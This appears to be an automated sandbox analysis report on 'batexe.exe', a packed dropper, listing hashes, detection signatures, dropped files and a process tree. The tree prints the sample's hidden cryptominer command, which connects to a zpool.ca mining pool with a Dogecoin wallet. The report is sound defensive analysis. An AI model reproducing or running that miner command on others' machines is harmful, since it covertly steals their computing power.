Analysis

  • max time kernel
    294s
  • max time network
    297s
  • platform
    windows10-1703_x64
  • resource
    win10-20240214-ja
  • resource tags

    arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    20/02/2024, 05:50

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4596
    • C:\Users\Admin\AppData\Local\Temp\E649.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\E649.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\E649.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EB2B.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4312
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4216

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\E649.tmp\b2e.exe

          Filesize

          1.6MB

          MD5

          4b3e3a3f84660472fb9714cd8feaba1b

          SHA1

          8561afb6ae0a1ab8a4d8364928811b66fcaf9da9

          SHA256

          006513b9e4310066d4cb66a1ea11b6619c10e428f5a1ccc39eab92e1d487f442

          SHA512

          a4ccf4de38da8d27dd065ef09b81a4bca708188c6102211faaa186ddd8f68b87381611da54cb6098758733c799e2a3450cb5cae66b58c29a4264d93f93a1edc2

        • C:\Users\Admin\AppData\Local\Temp\E649.tmp\b2e.exe

          Filesize

          1.8MB

          MD5

          f51fe7ed64e17eb639e2b77a503596fc

          SHA1

          9de36c8a5bd8a21c006aabe8c222294852a802f1

          SHA256

          706fdab761081f7c0cbe20066009c226b25636178215be354891409ae09eecc7

          SHA512

          ffd4c6f3d081da80edc1bdcc52052d9965c854f7f4fe83e655da803a0fc5f9c261219ec8e12b45ba432cec0d740d314e2be5700a592e581b9f057bccfe516fca

        • C:\Users\Admin\AppData\Local\Temp\EB2B.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          2.3MB

          MD5

          4c04147c386ba8792ac6a03069572a8a

          SHA1

          dda67789fc1d0f2469ca95f01a5c81034853ca6a

          SHA256

          c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

          SHA512

          a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          836KB

          MD5

          aeab40ed9a8e627ea7cefc1f5cf9bf7a

          SHA1

          5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

          SHA256

          218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

          SHA512

          c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          2.9MB

          MD5

          e8f54c9d2232b5e2661924e19f988e43

          SHA1

          dcb989bffcd25371a75c61e67222303bbde7bec8

          SHA256

          d11dbc57e8321c02cc16112a6300d8eb8cd869c3af1931ebb880b2a7273dc533

          SHA512

          c26b151a25ba76acf2e9beeaa812a2feced12b8c8bcc06f763bcd00e512e3372a6582b48b2542e07e3aac7a8202405edb04db5466637a73438d5e423427fc98d

        • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          1.2MB

          MD5

          7cf672bee2afba2dcd0c031ff985958e

          SHA1

          6b82a205db080ffdcb4a4470fce85a14413f3217

          SHA256

          c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

          SHA512

          3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

        • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          1024KB

          MD5

          61f1013547dc4ad24f8c5338c41931c3

          SHA1

          4a9f72fe7e71046ecd3d5af6443f195a6051430b

          SHA256

          2a65749eaa95c5c90be12d11587a82432933aabd60e8854868bc7168a36150ee

          SHA512

          6604219c7e5d583e8cc6a1f407e9964ab39791026857d17c9de25d3a4a8bb0272d491c6c019643eeeee8a2bd3451f3e0b75298e043777d44b8f3a161582c9b40

        • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          606KB

          MD5

          585efec1bc1d4d916a4402c9875dff75

          SHA1

          d209613666ccac9d0ddab29a3bc59aa00a0968fa

          SHA256

          2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

          SHA512

          b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

        • memory/2036-5-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/2036-50-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/4216-41-0x0000000070800000-0x00000000708BC000-memory.dmp

          Filesize

          752KB

        • memory/4216-61-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-42-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/4216-43-0x0000000074110000-0x00000000741A8000-memory.dmp

          Filesize

          608KB

        • memory/4216-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

          Filesize

          24.7MB

        • memory/4216-101-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-56-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-40-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-71-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-81-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-86-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-91-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4216-96-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4596-6-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB